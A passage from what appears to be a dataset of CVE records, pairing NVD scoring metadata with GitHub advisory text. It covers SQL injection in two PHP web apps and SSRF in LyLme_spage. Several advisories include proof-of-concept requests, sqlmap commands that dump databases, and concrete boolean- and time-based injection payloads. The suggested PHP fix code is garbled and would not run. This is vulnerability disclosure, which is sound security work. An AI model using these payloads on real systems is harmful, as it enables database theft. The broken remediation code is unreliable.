"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266590"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266590"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346310"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266590"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266590"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346310"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:learning_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2C73EA1D-9BD1-42A6-8A1B-5517519304A8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/L1OudFd8cl09/CVE/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"L1OudFd8cl09",
"CVE"
] | # Itsourcecode Learning Management System Project In PHP With Source Code v1.0 login.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Learning Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ N3xu5Cr4ck37
## Vulnerable File
+ login.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'login.php' file of the 'Learning Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "user_email" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="533" alt="1" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/8cbaa6fc-0e10-4870-9371-5fa8c22f1f63">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "user_email" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Learning Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
```
POST /e-learningsystem/login.php HTTP/1.1
Host: 192.168.210.199:1219
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://192.168.210.199:1219
Connection: close
Referer: http://192.168.210.199:1219/e-learningsystem/login.php
Upgrade-Insecure-Requests: 1
Priority: u=1
user_email=123231&user_pass=21312312&btnLogin=
```
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ UNION query
## Vulnerability location:
+ 'user_email' parameter
## Payload:
<img width="365" alt="2" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/da0fb05b-ef18-43cd-b24f-a880f5c3b547">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u 192.168.210.199:1219/e-learningsystem/login.php --data="user_email=123231&user_pass=21312312&btnLogin=" --method=POST --batch --dbs
```
<img width="264" alt="3" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/8bca9432-efdc-4b89-97e5-ea1e166ff996">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Learning Management System Project In PHP With Source Code v1.0 login.php SQL injection | https://api.github.com/repos/L1OudFd8cl09/CVE/issues/2/comments | 0 | 2024-06-03T01:09:10Z | 2024-06-03T01:22:04Z | https://github.com/L1OudFd8cl09/CVE/issues/2 | 2,329,970,652 | 2 | 6,046 |
CVE-2024-5588 | 2024-06-02T15:15:08.230 | A vulnerability was found in itsourcecode Learning Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file processscore.php. The manipulation of the argument LessonID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266839. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/12"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266839"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266839"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.347576"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266839"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266839"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.347576"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:learning_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2C73EA1D-9BD1-42A6-8A1B-5517519304A8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/12 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Learning Management System Project In PHP With Source Code v1.0 processscore.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Learning Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ mask71
## Vulnerable File
+ processscore.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'processscore.php' file of the 'Learning Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "LessonID" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="496" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/8d0dbd75-1384-468d-9ff7-e95f3046f7d6">
## Impact
+ Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "LessonID" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Learning Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
POST /e-learningsystem/processscore.php HTTP/1.1
Host: 192.168.210.199:1219
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.210.199:1219
Connection: close
Referer: http://192.168.210.199:1219/e-learningsystem/index.php?q=question&id=13
Priority: u=1
LessonID=13&btnSubmit=
```
## Vulnerability type:
+ time-based blind
+ boolean-based blind
## Vulnerability location:
+ 'LessonID' parameter
## Payload:
<img width="471" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/0a35dfda-fb29-43ea-b15c-e063723257c9">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u 192.168.210.199:1219/e-learningsystem/processscore.php --data="LessonID=13&btnSubmit=" --method=POST --batch --dbs
```
<img width="471" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2f22cbdb-8011-45e9-b219-b0dd4edd34ad">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Learning Management System Project In PHP With Source Code v1.0 processscore.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/12/comments | 0 | 2024-05-31T04:03:32Z | 2024-05-31T04:03:32Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/12 | 2,326,918,435 | 12 | 6,047 |
CVE-2024-36675 | 2024-06-04T22:15:10.740 | LyLme_spage v1.9.5 is vulnerable to Server-Side Request Forgery (SSRF) via the get_head function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/LyLme/lylme_spage/issues/92"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/LyLme/lylme_spage/issues/92"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "2B5D86CA-58F2-4545-9D9D-0BA9967C9506",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/LyLme/lylme_spage/issues/92 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"LyLme",
"lylme_spage"
] | # Summary
An SSRF (Server-Side Request Forgery) vulnerability was identified in the LyLme_spage version 1.9.5. This vulnerability allows internal network requests to be initiated and sensitive information to be retrieved by accessing a specific URL.
# Details
The vulnerability resides in the get_head function which is used to fetch and process web page titles, icons, descriptions, and keywords. However, through manipulation of the URL parameter accessed through http://192.168.0.10:1006/apply/index.php?url=[malicious_URL], an attacker can force the application to make arbitrary requests to internal services.
https://github.com/LyLme/lylme_spage/blob/b7c430a49e8b247ddb04401b1176157c10d52948/include/function.php#L211-L265
This is made possible due to insufficient validation of the user-supplied URL, allowing for the specification of arbitrary URLs that the server will then request data from. Consequently, this behavior can be exploited to interact with and extract information from services that are only accessible from the server's internal network.
# Impact
An attacker can exploit this vulnerability to conduct SSRF attacks, leading to unauthorized access to internal network services. This might result in the disclosure of sensitive information, interaction with internal APIs, or further exploitation depending on the nature of the accessible services. The impact is considerably high since it directly affects the confidentiality and integrity of the system.
# Proof of Concept (PoC)
```
http(s)://ip:port/apply/index.php?url=malicious_URL
```

| SSRF Vulnerability in LyLme_spage v1.9.5 | https://api.github.com/repos/LyLme/lylme_spage/issues/92/comments | 1 | 2024-05-22T05:41:55Z | 2025-01-29T03:29:05Z | https://github.com/LyLme/lylme_spage/issues/92 | 2,309,618,181 | 92 | 6,048 |
CVE-2024-36779 | 2024-06-06T13:15:31.590 | Sourcecodester Stock Management System v1.0 is vulnerable to SQL Injection via editCategories.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/42"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/42"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stock_management_system_project:stock_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F48DAD43-EB1C-4267-B97D-63BBFF86C70F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/42 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Stock Management System in PHP 1.0 editCategories.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Stock Management System in PHP
## Vendor Homepage
+ https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ xiao huangxin
## Vulnerable File
+ editCategories.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the `editCategories.php` file of the `Stock Management System` project. This issue arises because user inputs `editCategoriesName`, `editCategoriesStatus`, and `editCategoriesId` from `$_POST['editCategoriesName']`, `$_POST['editCategoriesStatus']`, and `$_POST['editCategoriesId']` are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations.
## Vulnerability code snippets
```php
<?php
require_once 'core.php';
$valid['success'] = array('success' => false, 'messages' => array());
if($_POST) {
$brandName = $_POST['editCategoriesName'];
$brandStatus = $_POST['editCategoriesStatus'];
$categoriesId = $_POST['editCategoriesId'];
$sql = "UPDATE categories SET categories_name = '$brandName', categories_active = '$brandStatus' WHERE categories_id = '$categoriesId'";
if($connect->query($sql) === TRUE) {
$valid['success'] = true;
$valid['messages'] = "Successfully Updated";
} else {
$valid['success'] = false;
$valid['messages'] = "Error while updating the categories";
}
$connect->close();
echo json_encode($valid);
} // /if $_POST
```
+ In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Stock Management System," xiao huangxin discovered a critical SQL injection vulnerability in the `editCategories.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'editCategoriesName' parameter
## Payload:
```sql
editCategoriesName=1' AND 2603=(SELECT (CASE WHEN (2603=2603) THEN 2603 ELSE (SELECT 4614 UNION SELECT 5853) END))-- -&editCategoriesStatus=1&editCategoriesId=7
editCategoriesName=1' AND (SELECT 9162 FROM (SELECT(SLEEP(5)))eYsz)-- sSlF&editCategoriesStatus=1&editCategoriesId=7
```
```makefile
Parameter: editCategoriesName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: editCategoriesName=1' AND 2603=(SELECT (CASE WHEN (2603=2603) THEN 2603 ELSE (SELECT 4614 UNION SELECT 5853) END))-- -&editCategoriesStatus=1&editCategoriesId=7
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editCategoriesName=1' AND (SELECT 9162 FROM (SELECT(SLEEP(5)))eYsz)-- sSlF&editCategoriesStatus=1&editCategoriesId=7
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost/stock/php_action/editCategories.php" --data="editCategoriesName=1&editCategoriesStatus=1&editCategoriesId=7" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump
```
+ 
+ 
+ 
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
```PHP
//Create database connection
$conn=new mysqli ($servername, $username, $password, $dbname);
//Check connection
If ($conn ->connect_error){
Die ("Connection failed:")$ conn->connect_error);
}
//Prepare and bind
$stmt=$conn ->prepare ("UPDATE categories SET name=?")?, status = ? WHERE id = ? );
$stmt ->bind_param ("ssi", $editCategoriesName, $editCategoriesStatus, $editCategoriesId);
//Set parameters and execute
$editCategoriesName=$POST ['editCategoriesName '];
$editCategoriesStatus=$POST ['editCategoriesStatus'];
$editCategoriesId=$POST ['editCategoriesId '];
$stmt ->execute();
Echo "Record updated successfully";
$stmt ->close();
$conn ->close();
```
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format. For example, PHP's' filter_input 'function can be used to validate and filter input data.
```PHP
$editCategoriesName=filter_input (Input-Post, 'editCategoriesName', FILTER_SANITIZE_STRING);
$editCategoriesStatus=filter_input (Input-Post, 'editCategoriesStatus', FILTER_VALIDATE_INT);
$editCategoriesId=filter_input (Input-Post, 'editCategoriesId', FILTER_VALIDATE_INT);
If ($editCategoriesName===false | | $editCategoriesStatus==false | | $editCategoriesId===false){
Die ("Invalid input");
}
//Continue processing database operations
```
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| SourceCodester Stock Management System in PHP 1.0 editCategories.php SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/42/comments | 0 | 2024-05-24T00:25:31Z | 2024-05-24T04:30:13Z | https://github.com/CveSecLook/cve/issues/42 | 2,314,064,021 | 42 | 6,049 |
